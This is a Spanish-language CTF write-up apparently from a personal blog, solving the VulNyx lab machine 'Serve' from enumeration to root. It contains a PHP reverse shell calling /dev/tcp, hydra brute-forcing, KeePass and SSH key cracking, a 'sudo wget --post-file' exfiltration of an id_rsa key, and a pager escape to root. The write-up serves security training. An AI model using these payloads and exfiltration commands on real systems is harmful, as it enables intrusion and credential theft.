cd ~/blog

~/writeups/vulnyx/06-serve.md

06 - Serve

easy Linux vulnyx 11-02-2025
KeePass database crackingWebDAV file upload (RCE)sudo wget file exfiltrationsudo bro (less escape) Privesc
vulnyx.com

~1 min de lectura


Enumeramos puertos y directorios:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.51
 nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.51
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 13:38 -03
Nmap scan report for 192.168.1.51
Host is up (0.00028s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 9a:0c:75:5a:bb:bb:06:a2:9a:7d:be:91:ca:45:45:e4 (RSA)
|   256 07:7d:e7:0f:0b:5e:5a:90:e9:33:72:68:49:3b:f5:8c (ECDSA)
|_  256 6c:15:32:a7:42:e7:9f:da:63:66:7d:3a:be:fb:bf:14 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds
 gobuster dir -u 'http://192.168.1.51' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,sql,png,xml,zip,sh -r
...
/index.html           (Status: 200) [Size: 10701]
/javascript           (Status: 403) [Size: 277]
/notes.txt            (Status: 200) [Size: 173]
/secrets              (Status: 200) [Size: 7]
/webdav               (Status: 401) [Size: 459]
...

El notes.txt da una pista: las credenciales del recurso están en /secrets, y hay que reemplazar una X por un número de empleado:

 cat notes.txt
Hi teo,

the database with your credentials to access the resource are in the secret directory
(Don't forget to change X to your employee number)

regards
IT department

Enumeramos /secrets y encontramos una base de datos KeePass:

 gobuster dir -u 'http://192.168.1.51/secrets' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -x sql,db,kdbx -r
...
/db.kdbx              (Status: 200) [Size: 2078]
...

Crackeamos la contraseña maestra con john:

 keepass2john db.kdbx > hash
 john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
dreams           (db)
...

Abrimos la base de datos y obtenemos una credencial parcial (con la X que mencionaba la nota):

admin:w3bd4vXXX

Generamos un diccionario sustituyendo las X por números y hacemos fuerza bruta contra el WebDAV:

 for num in {100..999}; do echo "w3bd4v$num" >> wordlist.txt; done

 hydra -l admin -P wordlist.txt 192.168.1.51 http-get /webdav -t 64
...
[80][http-get] host: 192.168.1.51   login: admin   password: w3bd4v513
...

WebDAV permite subir archivos, así que subimos una reverse shell PHP:

 cat pwned.php
<?php
    shell_exec("bash -c 'bash -i >& /dev/tcp/192.168.1.7/1234 0>&1'");
?>

 curl -T pwned.php -u admin:w3bd4v513 http://192.168.1.51/webdav/ --digest
...
<p>Resource /webdav/pwned.php has been created.</p>
...

 ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.51:43668.
bash: cannot set terminal process group (462): Inappropriate ioctl for device
bash: no job control in this shell
www-data@serve:/var/www/webdav$

Para escalar privilegios, revisamos los permisos sudo:

www-data@serve:/tmp$ sudo -l
Matching Defaults entries for www-data on Serve:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on Serve:
    (teo) NOPASSWD: /usr/bin/wget

Podemos ejecutar wget como teo. Abusamos de --post-file para exfiltrar la clave id_rsa de teo hacia nuestra máquina:

 nc -lvnp 9999 > id_rsa

www-data@serve:/var/www$ sudo -u teo /usr/bin/wget --post-file=/home/teo/.ssh/id_rsa 192.168.1.7:9999

Corregimos el formato de la clave, crackeamos la passphrase y nos conectamos como teo, obteniendo la primera flag:

 ssh2john.py id_rsa > hash
 john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
private          (id_rsa)
...

 ssh teo@192.168.1.51 -i id_rsa
Enter passphrase for key 'id_rsa': private
Linux serve 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
tput: unknown terminal "xterm-kitty"
tput: unknown terminal "xterm-kitty"
tput: unknown terminal "xterm-kitty"
tput: unknown terminal "xterm-kitty"
tput: unknown terminal "xterm-kitty"
tput: unknown terminal "xterm-kitty"
teo@serve:~$

Revisamos los permisos sudo de teo:

teo@serve:~$ sudo -l
Matching Defaults entries for teo on Serve:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User teo may run the following commands on Serve:
    (root) NOPASSWD: /usr/local/bin/bro

Podemos ejecutar bro como root, que abre una instancia tipo less con el manual de un comando; desde ahí escapamos a un shell de root:

teo@serve:~$ sudo bro ls
!/bin/bash
root@serve:/home/teo#

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados